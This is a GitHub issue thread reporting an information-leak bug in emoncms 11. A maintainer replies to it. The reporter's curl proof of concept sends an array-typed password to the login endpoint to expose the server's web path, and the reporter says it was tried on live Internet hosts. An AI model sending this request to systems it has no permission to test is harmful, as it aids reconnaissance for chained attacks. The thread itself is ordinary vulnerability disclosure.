emoncms/emoncms #1856: A bug leaked server web directory and other information

tdragon6, 2023-05-08:
### Description

emoncms 11 and later version suffers from an information leakage vulnerability. An unauthorized attacker can obtain the web directory path and other information leaked by the server by constructing a special http request.

### Poc:

```
curl 'http{s}://{IP}:{PORT}/user/login.json' -X POST -i   -H 'Content-Type: application/x-www-form-urlencoded' -H 'Accept: text/plain, */*; q=0.01' -H 'X-Requested-With: XMLHttpRequest' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36' -H 'Host: {IP}:{PORT}' -H 'Connection: Keep-alive'  -d 'password%5B%5D=1&referrer=&rememberme=1&username=1'
```

### Screenshot

1.The environment I built myself

[image]

2.Real Tests on the Internet

[image]

TrystanLea, 2023-05-09:
Hello @tdragon6 

Thanks for the report. This fairly low risk, output of errors has been turned on in emoncms since the start.. for better or worse..

apart from the web directory which in this example is standard public info, the other information is all open source in the source code anyway…

I will look into the error as it would be good to clean that up anyway

thanks again!

tdragon6, 2023-05-09:
Hello,

At present, this bug is a low-level vulnerability, but if other vulnerabilities such as file upload, directory traversal, and arbitrary file download appear in other locations, the attacker can cooperate with this leaked information to attack.

It should be noted that the web paths deployed by different sites may be different.

closed 2023-05-10 by TrystanLea